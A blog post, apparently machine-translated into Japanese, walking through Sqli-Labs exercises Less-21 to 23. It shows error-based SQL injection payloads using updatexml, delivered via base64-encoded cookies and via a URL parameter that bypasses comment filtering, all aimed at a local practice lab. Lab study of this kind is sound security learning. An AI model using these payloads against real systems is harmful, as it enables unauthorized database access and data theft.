Sqli-Lab | Less 21-23

1394 ワード

sqliターゲットフィールドはずっとやる暇がなくて、冬休みの间にそれをして、同时にSQL注入を固めます

Less-21


Less-21 Cookie Injection- Error Based- complex - string
クッキー注入-エラーベース-複雑-文字列

テスト


登録されたunameの値が暗号化され、=で終わると、まずbase 64が意外にもbase 64がburpを暗号化してパケットをキャプチャしていることを思い出し、cookieunameを変更して暗号化すればpayload
admin') and updatexml(1,concat(0x7e,(select user()),0x7e),1#

ソースコード

cookieを設定し、base 64暗号化を使用してcookieunameを呼び出し、base 64を暗号化します.sql文は直接クエリーを行い、エラーと結果を返します.

Less-22


Less-22 Cookie Injection- Error Based- Double Quotes - string
クッキー注入-エラーベース-二重引用符-文字列payload
admin" and updatexml(1,concat(0x7e,(select user()),0x7e),1#

Less-23


Error Based- strip comments
エラーベース-フィルタあり

テスト

http://127.0.0.1/sqli/Less-23/?id=1'
http://127.0.0.1/sqli/Less-23/?id=1'#
http://127.0.0.1/sqli/Less-23/?id=1'%23
http://127.0.0.1/sqli/Less-23/?id=1'--+
'が増えました.注釈をフィルタリングしたはずです.それは引用符で閉じます.
http://127.0.0.1/sqli/Less-23/?id=1' or 1='1

payload:
1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or 1='1

ソースコード


コメントの置換